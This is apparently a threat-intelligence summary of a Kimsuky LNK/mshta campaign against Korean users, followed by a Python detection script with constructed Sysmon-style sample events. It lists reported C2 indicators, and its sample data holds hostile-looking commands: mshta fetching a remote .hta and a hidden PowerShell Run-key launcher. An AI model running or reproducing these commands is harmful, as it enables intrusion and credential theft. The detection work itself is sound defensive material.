Kimsuky Attack Disguised as Sex Offender Notification Information (original Korean title: 성범죄자 고지 정보를 위장한 Kimsuky 공격)
2025-09-18 • Logpresso
Logpresso attributes a July 2025 LNK-based intrusion to North Korea-linked Kimsuky. The decoy archives are themed around sex offender notification and tax notice documents, and the infection starts from a disguised shortcut (LNK).

The shortcut launches mshta.exe, which retrieves encrypted payloads from remote infrastructure, decrypts the downloaded ZIP content with hardcoded AES key material, and runs PowerShell and VBS components from the user profile. The malware collects system information, recent files, browser data, wallet-extension artifacts, NPKI/GPKI certificate stores, keystroke logs, clipboard contents, and files matching document- or wallet-related patterns, then encrypts the collected data and uploads it to the C2 server in chunks. It persists through a Run registry entry, avoids running in virtualized environments, and polls the C2 for upload, download, command execution, and DLL execution tasks. Reported infrastructure includes mailhubsec.com subdomains and 142.11.248.98.

The findings matter because the campaign combines familiar Kimsuky social engineering with credential, certificate, browser, wallet, and file theft capabilities aimed at Korean users.
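The chain summarized above (a shortcut launching mshta.exe with a remote URL, a Run key that starts a script host from the user profile, and polling of the reported C2 infrastructure) can be turned into host-level detection logic. The following is an added example, not Logpresso's code or tooling from the report: it runs three checks over constructed Sysmon-style records (event ID 1 process creation, 13 registry value set, 3 network connection) and escalates a host when two or more stages of the chain are seen. Only mailhubsec.com and 142.11.248.98 come from the report; the host names, user name, script file names and the Run value names are assumptions made for the example.

```python
"""Triage of constructed Sysmon-style events for the Kimsuky LNK chain.

Added example, not code from the Logpresso report. Field names follow Sysmon
event IDs 1 (process create), 13 (registry value set) and 3 (network connect);
every host, user and file name below other than the report's IOCs is assumed.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Network IOCs quoted in the report summary.
C2_DOMAIN = "mailhubsec.com"
C2_IPS = {"142.11.248.98"}

RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
USER_PROFILE_RE = re.compile(r"[a-z]:\\users\\[^\\]+\\", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def is_c2_host(host: str) -> bool:
    """True for the reported IP, the apex domain, or any mailhubsec.com subdomain."""
    h = host.lower().rstrip(".")
    return h in C2_IPS or h == C2_DOMAIN or h.endswith("." + C2_DOMAIN)


def check_process_create(ev: dict) -> list[str]:
    """Stage 1: mshta.exe started with a remote URL (Sysmon event 1)."""
    if not ev.get("Image", "").lower().endswith("\\mshta.exe"):
        return []
    m = URL_RE.search(ev.get("CommandLine", ""))
    if m is None:
        return []
    reasons = ["mshta.exe launched with a remote URL"]
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("parent is explorer.exe, consistent with a double-clicked shortcut")
    if is_c2_host(urlparse(m.group(0)).hostname or ""):
        reasons.append("URL host matches reported C2 infrastructure")
    return reasons


def check_registry_set(ev: dict) -> list[str]:
    """Persistence: a Run value whose data starts a script host from the user profile (event 13)."""
    if not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return []
    data = ev.get("Details", "").lower()
    if not any(host in data for host in SCRIPT_HOSTS):
        return []
    if not USER_PROFILE_RE.search(data):
        return []
    return ["Run key points a script host at a file under the user profile"]


def check_network(ev: dict) -> list[str]:
    """C2 polling: connection to the reported domain or IP (event 3)."""
    for field in ("DestinationHostname", "DestinationIp"):
        if is_c2_host(ev.get(field, "")):
            return [f"network connection to reported C2 ({ev[field]})"]
    return []


CHECKS = {1: check_process_create, 13: check_registry_set, 3: check_network}


def triage(events: list[dict]) -> dict[str, dict]:
    """Correlate findings per host; a host showing two or more distinct stages is escalated."""
    per_host = defaultdict(lambda: {"stages": set(), "reasons": []})
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        if check is None:
            continue
        reasons = check(ev)
        if reasons:
            entry = per_host[ev["Computer"]]
            entry["stages"].add(ev["EventID"])
            entry["reasons"].extend(reasons)
    for entry in per_host.values():
        entry["escalate"] = len(entry["stages"]) >= 2
    return dict(per_host)


# Constructed sample telemetry (assumed host WS01, user alice): the reported chain,
# a benign Run value that must not fire, and an unrelated host.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'mshta.exe "https://update.mailhubsec.com/notice.hta"'},
    {"EventID": 13, "Computer": "WS01",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'powershell.exe -w hidden -f "C:\Users\alice\AppData\Roaming\svc.ps1"'},
    {"EventID": 13, "Computer": "WS01",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 3, "Computer": "WS01", "DestinationIp": "142.11.248.98",
     "DestinationHostname": ""},
    {"EventID": 3, "Computer": "WS02", "DestinationIp": "203.0.113.5",
     "DestinationHostname": "example.org"},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, "ESCALATE" if result["escalate"] else "review", result["reasons"])
```

The Run-key check deliberately requires both a script host and a user-profile path, so a legitimate per-user Run value such as the OneDrive entry in the sample is left alone while a PowerShell or VBS launcher under AppData is flagged; the domain match uses a suffix test on "." + domain so that a look-alike such as mailhubsec.com.evil.test does not match.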